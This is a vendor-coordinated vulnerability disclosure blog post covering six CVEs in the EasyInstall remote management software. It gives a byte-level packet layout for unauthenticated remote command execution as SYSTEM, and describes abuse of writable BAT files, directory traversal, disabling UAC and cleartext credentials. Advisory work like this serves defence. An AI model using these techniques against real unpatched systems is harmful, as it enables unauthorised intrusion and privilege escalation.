Multiple vulnerabilities in EasyInstall RMM and deployment software

This blog post highlights bugs found in installed software during a customer engagement and reported aligned with the Improsec Responsible Disclosure Policy.

Timeline

  • Improsec identified the vulnerabilities during a customer engagement. Each vulnerability was validated in a simulated Active Directory Lab afterwards.

  • The vulnerabilities were disclosed to the vendor, IXP Data, on November 11 of 2019.

  • IXP Data releases EasyInstall version 6.3.101 which patches all six vulnerabilities on November 15 of 2019.

  • We want to thank IXP Data for an effective and professional response.

CVEs registered (see appendix for more details)

  • CVE #1: CVE-2019-19897 - Remote Code Execution as SYSTEM via EasyInstall Agent Service

  • CVE #2: CVE-2019-19896 - Remote Code Execution as SYSTEM via weak permissions on EasyInstall Engine Service share

  • CVE #3: CVE-2019-19893 - Directory Traversal (TCP 8000) as SYSTEM via EasyInstall Engine Service

  • CVE #4: CVE-2019-19895 - Lateral Movement using EasyInstall Agent Service against other users on client system

  • CVE #5: CVE-2019-19894 - Disable UAC using EasyInstall Agent Service on client system

  • CVE #6: CVE-2019-19898 - Clear-text credentials in network communication (TCP 20050) when using EasyInstall Admininistrator console

What is EasyInstall (IXP)

EasyInstall is a remote management and deployment suite created by IXP Data. A typical setup consists of a EasyInstall Server and various clients each with a EasyInstall agent installed. The agent runs as a service executable on deployed Windows clients.

The affected and tested version is: 6.2.13723


Remote Code Execution as SYSTEM via EasyInstall Agent Service

CVE-ID: CVE-2019-19897

The EasyInstall admin management client features a remote command execution function. This function connects via TCP-port 20051 to the agent on the selected client. By intercepting the TCP-packet with Wireshark we found that the agent performed no authentication or origin check when receiving the TCP-packet

Remote Code Execution as SYSTEM via EasyInstall Agent Service

Remote command packet viewed in wireshark

The default packet structure contained various information, however much of the data could be omitted. The required packet structure consists of:

  1. Header bytes(x37x09)

  2. Server name(not needed)

  3. Separator byte(x09)

  4. Server IP(not needed)

  5. Separator byte(x09)

  6. Server name in lowercase(not needed)

  7. Separator byte(x09)

  8. Agent hostname

  9. Separator byte(x09)

  10. Port(not needed)

  11. Separator byte(x09)

  12. Agent version @ server name(not needed)

  13. Separator byte(x09)

  14. Command to execute

A simple python script sending the above packet from any computer on the LAN would gain remote code execution as “NT AUTHORITY” on the client.

Remote Code Execution as SYSTEM via EasyInstall Agent Service

Sending packet to client.

Remote Code Execution as SYSTEM via EasyInstall Agent Service

cmd.exe executed as “NT AUTHORITY” on the client.

Recommendation

Update to the newest version of EasyInstall.

Remote Code Execution as SYSTEM via weak permissions on EasyInstall Engine Service share

CVE-ID: CVE-2019-19896

The default EasyInstall installation creates a network share called “IXP$” on the EasyInstall server. Authenticated Active Directory users has read/write rights to this share and some of its sub-directories. This allows for multiple ways to perform remote code execution on the EasyInstall server and its clients as well as privileged escalation on clients.

To perform remote code execution on the EasyInstall server, we edited and inserted commands into the BAT-file “Report.bat” in the sub-directory “AUTOMATION”. This file is executed when EasyInstall either automatic or manual creates usage reports. The BAT-file is executed as “NT AUTHORITY/SYSTEM” on the EasyInstall server.

Remote Code Execution as SYSTEM via weak permissions on EasyInstall Engine Service share -

Full access rights to IXP$ share for authenticated users

Remote Code Execution as SYSTEM via weak permissions on EasyInstall Engine Service share

Adding commands to writable BAT-files on IXP server share

Remote Code Execution as SYSTEM via weak permissions on EasyInstall Engine Service share

Remote code execution on IXP server

Recommendation

Update to the newest version of EasyInstall.

Directory Traversal (TCP 8000) as SYSTEM via EasyInstall Engine Service

CVE-ID: CVE-2019-19893

The EasyInstall server deploys by default a custom created web-server on TCP-port 8000. This custom web-server serves the IXP-data directory to any visitors connecting to the web-server. By performing a directory traversal it was possible to access any file on the IXP server in the user context of “NT AUTHORITY”.

Directory Traversal (TCP 8000) as SYSTEM via EasyInstall Engine Service

Performing directory traversal

Directory Traversal (TCP 8000) as SYSTEM via EasyInstall Engine Service

Performing directory traversal to directory restricted to local administrator

Recommendation

Update to the newest version of EasyInstall

Lateral Movement using EasyInstall Agent Service against other users on client system

CVE-ID: CVE-2019-19895

When deploying software packages to a client system the sub-directory “C:” is used as a storage directory for various installation and configuration files. Each software package is placed in a sub-directory with a defined name(fx. AND00001 or SW000231). All authenticated users have read/write rights to these subdirectories and their content. On user logon the EasyInstall agent will traverse each “C:” sub-directory for BAT-files named “EveryLogon.bat” and execute them in the context of the logged on user.

By inserting commands into a “EveryLogon.bat” file, we were able to perform lateral movement on the client system.

Lateral Movement using EasyInstall Agent Service against other users on client system

File permissions to “EveryLogon.bat”

Lateral Movement using EasyInstall Agent Service against other users on client system

Inserting commands into BAT-file.

Recommendation

Update to the newest version of EasyInstall

Disable UAC using EasyInstall Agent Service on client system

CVE-ID: CVE-2019-19894

The IXP agent is by default installed to the directory “C:”. This directory is read/write/view restricted by default, however the sub-directory “C:”, which contains the agents configuration files, isn’t restricted for modification of the contained files. This allowed us to create a modified version of the configuration-file “IXPAS.IXP” and rename the original to another filename. The configuration file contained the option: “DisableUAC” which by default enabled UAC. Setting the value to “0” and rebooting the client system disabled UAC for all users. Performing one more reboot restored the default settings.

Disable UAC using EasyInstall Agent Service on client system

UAC enabled by default

Disable UAC using EasyInstall Agent Service on client system

Disabling UAC via modified “IXPAS.IXP”

Disable UAC using EasyInstall Agent Service on client system

UAC disabled after reboot

Recommendation

Update to the newest version of EasyInstall

Clear-text credentials in network communication (TCP 20050) when using EasyInstall Administrator console

CVE-ID: CVE-2019-19898

The IXP Administrator application “IXPADM64.EXE” is used by IXP administrators to connect to the deployed IXP server. The application is either used to connect to localhost or a remote server. When using a remote server the administrator username and password is send in clear text to the IXP server instance during login.

Clear-text credentials in network communication (TCP 20050) when using EasyInstall Admininistrator console

Username “easyinstall_adm” and password(hidden with red block) in TCP-packet.

Recommendation

Update to the newest version of EasyInstall

(Updated January 23, fixed CVE IDs and links)